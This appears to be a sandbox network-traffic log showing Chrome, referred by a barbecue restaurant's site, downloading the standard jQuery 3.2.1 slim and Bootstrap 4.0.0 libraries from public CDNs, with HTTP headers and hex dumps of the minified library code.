                                                        2024-12-25 01:23:12 UTC1369INData Raw: 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45
                                                        Data Ascii: g=function(t){return t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTE
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73
                                                        Data Ascii: lement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 29 74 2e 74 6f 28 69 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69
                                                        Data Ascii: )t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];i


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.449760151.101.2.1374432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:11 UTC539OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                        Host: code.jquery.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://yungbucksbbq.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-12-25 01:23:12 UTC612INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 69597
                                                        Server: nginx
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                        ETag: "28feccc0-10fdd"
                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                        Access-Control-Allow-Origin: *
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Via: 1.1 varnish, 1.1 varnish
                                                        Accept-Ranges: bytes
                                                        Date: Wed, 25 Dec 2024 01:23:11 GMT
                                                        Age: 649692
                                                        X-Served-By: cache-lga21984-LGA, cache-ewr-kewr1740051-EWR
                                                        X-Cache: HIT, HIT
                                                        X-Cache-Hits: 507, 35
                                                        X-Timer: S1735089792.909225,VS0,VE0
                                                        Vary: Accept-Encoding
                                                        2024-12-25 01:23:12 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                        Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                        2024-12-25 01:23:12 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                                                        Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                                                        2024-12-25 01:23:12 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                        Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                                                        2024-12-25 01:23:12 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                                                        Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                                                        2024-12-25 01:23:12 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                                                        Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                                                        2024-12-25 01:23:12 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                                                        Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                                                        2024-12-25 01:23:12 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                                                        Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                                                        2024-12-25 01:23:12 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                                                        Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                                                        2024-12-25 01:23:12 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                                                        Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                                                        2024-12-25 01:23:12 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                                                        Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.449761104.18.11.2074432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:11 UTC558OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                        Host: maxcdn.bootstrapcdn.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://yungbucksbbq.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-12-25 01:23:12 UTC967INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:11 GMT
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CDN-PullZone: 252412
                                                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                        CDN-RequestCountryCode: US
                                                        Vary: Accept-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=31919000
                                                        ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                        Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                        CDN-ProxyVer: 1.06
                                                        CDN-RequestPullSuccess: True
                                                        CDN-RequestPullCode: 200
                                                        CDN-CachedAt: 11/06/2024 23:22:44
                                                        CDN-EdgeStorageId: 1067
                                                        timing-allow-origin: *
                                                        cross-origin-resource-policy: cross-origin
                                                        X-Content-Type-Options: nosniff
                                                        CDN-Status: 200
                                                        CDN-RequestTime: 0
                                                        CDN-RequestId: 4b27a6159bc37045f1b4a0164e815dfb
                                                        CDN-Cache: HIT
                                                        CF-Cache-Status: HIT
                                                        Age: 1949363
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Server: cloudflare
                                                        CF-RAY: 8f75063fec9bf78f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-12-25 01:23:12 UTC402INData Raw: 37 62 65 63 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                        Data Ascii: 7bec/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69
                                                        Data Ascii: fine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defi
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45
                                                        Data Ascii: :function(n){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isE
